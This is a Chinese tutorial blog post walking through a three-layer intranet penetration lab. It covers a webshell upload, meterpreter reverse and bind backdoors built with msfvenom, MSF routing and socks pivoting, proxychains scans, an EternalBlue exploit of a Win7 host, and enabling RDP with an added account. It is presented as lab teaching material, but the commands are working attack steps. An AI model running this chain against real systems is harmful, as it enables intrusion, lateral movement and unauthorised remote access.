内网渗透

  • 前言
  • 1.实验简介
    • 网络拓扑图
  • 2.环境搭建
    • 第一层网络
    • 第二层网络
    • 第三层网络
  • 最后
    • 第一台Linux
    • 第二台Linux
  • 3.实验过程
    • 第一层靶机
    • 蚁剑连接
    • 进一步做内网渗透,上传msf后门
    • 生成一个名为mshell.elf的msf后门文件
    • 蚁剑把后门文件上传到Linux靶机
    • 返回msf 开启监听
    • Kail接受到MSF会话
    • 添加路由
    • 使用MSF建立socks代理
    • 第二层网络
  • 第三层网络
    • 添加路由
    • Win10远程桌面连接
    • 登陆成功

前言


近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

1.实验简介

网络拓扑图

渗透机:win10+kali

第一层靶机 (外网web服务器): Linux

第二场靶机 (内网web服务器): Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解MSF、内网转发等。

2.环境搭建

第一层网络

把渗透机kali和win10网卡1设置选择VMnet1:

靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

第二层网络

将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:

第三层网络

将靶机win7网卡1设置选择VMnet3:
再配置好各台机器对应IP即可。

最后

在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。

第一台Linux

第二台Linux

3.实验过程

第一层靶机

win10访问http://192.168.85.131/直接上传一句话木马

蚁剑连接


进一步做内网渗透,上传msf后门

打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件

蚁剑把后门文件上传到Linux靶机

返回msf 开启监听

use exploit/multi/handler 使用监听模块
set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木马的端口
run 执行

蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入

chmod 777 mshell.elf 加执行权限
./mshell.elf 执行文件

Kail接受到MSF会话

输入ifconfig,发现第二层172.10.10.0/24网段

添加路由

background 将会话转到后台
route add 172.10.10.0/24 1
添加 172.10.10.0/24网段 使用session1
route print 查看路由表

使用MSF建立socks代理

use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run
配置socks4代理的相关客户端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf添加socks4 192.168.85.128 10080这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。

建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络

第二层网络

nmap探测存在web服务的主机

用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。

脚本探测存活主机

在本地创建一个名为ping.sh的脚本,脚本内容如下:

#!/bin/bash
ip=”172.10.10.”
echo “ping log:” > ./ping.txt
for i in {1..254}
do
ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
done
echo “wait 5s….”
sleep 5
cat ./ping.txt
cat ./ping.txt | wc -l

Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload
进入shell执行

python -c ‘import pty;pty.spawn(“/bin/bash”)’

创建一个完全交互式shell,后

Chmod 777 ping.sh
./ping.sh

可以看到172.10.10.0/24网段存活56.57两台知道存活主机ip后就可以继续进入第二层内网主机

渗透机浏览器配置sock4a代理

蚁剑加代理连接
连接 http://172.10.10.56/upload/php1.php
进一步做内网渗透,继续上传msf后门

制作MSF后门

返回kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf后门文件

因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。
蚁剑上传后门
蚁剑打开虚拟终端执行后门文件
返回会话
输入ifconfig 发现第三层网络的网段10.10.10.0/24

第三层网络

添加路由

background
route add 10.10.10.0/24 2
route print
进入session 2 上传 脚本 探测存活主机
注意把脚本的ip段修改成该网段再上传
探测到第三层网段的存活ip :10.10.10.101
proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101
发现445端口开启

尝试使用ms17-010
use windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload windows/x64/meterpreter/bind_tcp
set lport 4466

Run ,存在445漏洞

执行成功,返回会话开启3389远程桌面

run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户
将3389端口转回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101

Win10远程桌面连接

登陆成功

网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习,大家下载就行
【点此下载】

好了,大概内网渗透流程就是这样子的,喜欢本文的一键三连~

我猜你也在找内网渗透,这篇难道还不够你嚼烂?相关推荐

  1. 内网渗透-代理篇(reGeorg+Proxifier代理工具)

    声明:贝塔安全实验室公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载.未经授权,严禁转载,如需转载,请联系开白!请勿利用文章内的相关技术从事非法测试,如因 ...

  2. 内网渗透——信息收集

    目录 手工信息收集 基本命令 查看用户信息 查看共享信息 查看ARP缓存 查看本机共享 获取系统补丁情况 查看系统信息 查看已安装软件信息 本地运行环境 查看服务信息 查看进程列表/杀软 查看启动项 ...

  3. 内网渗透-完整的域渗透

    文章首发于Freebuf:https://www.freebuf.com/articles/network/306284.html 文章目录 域环境 概念 创建域 创建组&用户 加入域 域渗透 ...

  4. 内网渗透测试第一章——内网基础知识

    (一)内网基础知识 1. 内网概述 内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组.一般是方圆几千米以内.局域网可以实现文件管理.应用软件共 ...

  5. kali扫描内网ip_来,我们聊聊内网渗透!

    文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...

  6. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  7. 【内网渗透】利用非常规手段突破安全策略上线CS

    前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...

  8. pyqt 把控制台信息显示到_内网渗透初识—信息收集

    进入到内网后,首先要对自己当前所处的网络环境有一个清楚地判断,收集到有关当前环境足够多的信息,为接下来的渗透做好准备 PS:文中提到的PowerSploit 本机信息 包括操作系统,当前用户权限,内网 ...

  9. 内网渗透-域渗透简单思路

    文章目录 1.权限提升 2.渗透姿势 爆hash,爆aes key 爆hash 爆aes key 3.远程登录 注册表修改 连接命令 4.连接操作 PTH攻击(利用明文或hash连接) IPC(明文连 ...

最新文章

  1. 4-STM32物联网开发WIFI(ESP8266)+GPRS(Air202)系统方案安全篇(为域名申请SSl证书)
  2. 干货整理 Unity3D资源汇总
  3. PS菜鸟入门 -- 窗口
  4. 前端攻城狮学习笔记七:常见前端面试题之HTML/CSS部分(二)
  5. 关于数据分析用到的统计学知识
  6. 倒计时3天!这届XIN公益大会很不一般!
  7. 局域网组网方案,电信1000M宽带无线WiFi满速方案与排查(随记)
  8. 20155310《网络对抗》免杀原理与实践
  9. el-upload+额外的参数 , element上传功能组件及其参数的详解
  10. VB 数据库交互(二)——经典五实例总结
  11. [Transformer]CvT:Introducing Convolutions to Vision Transformers
  12. ubuntu20.04下载安装有道词典
  13. QT获取微秒级时间戳
  14. 线程局部变量 ThreadLocal
  15. 某校2019专硕编程题-简易计算器
  16. FineBI物流行业可视化分析
  17. cassandra java_Cassandra安装与Java操作
  18. 声卡在多媒体计算机中起到什么作用,请问计算机当中声卡的作用是什么?
  19. vue3-父子组件间通信
  20. js学习笔记2 -- js使用方法

热门文章

  1. 英语软件的日志怎么写
  2. 均值场博弈_平均场博弈论(Mean-field Games)简介
  3. 小梅哥三段式状态机按键消抖改写
  4. 既生 Redis 何生 LevelDB?
  5. Oracle 11g 学习笔记-14(数据库性能优化)
  6. 云计算的“傲慢”与“偏见”
  7. 家畜育种学(题库及答案)
  8. Docker 三剑客-------docker swam,visualizer监控、stack部署集群、Portainer可视化
  9. spring.rabbitmq.template.mandatory 和spring.rabbitmq.publisher-returns
  10. 三星 j3 android 8.0,三星J3 Pro官方台湾版安卓8.0固件线刷包:BRI-J330GDXS3BSF5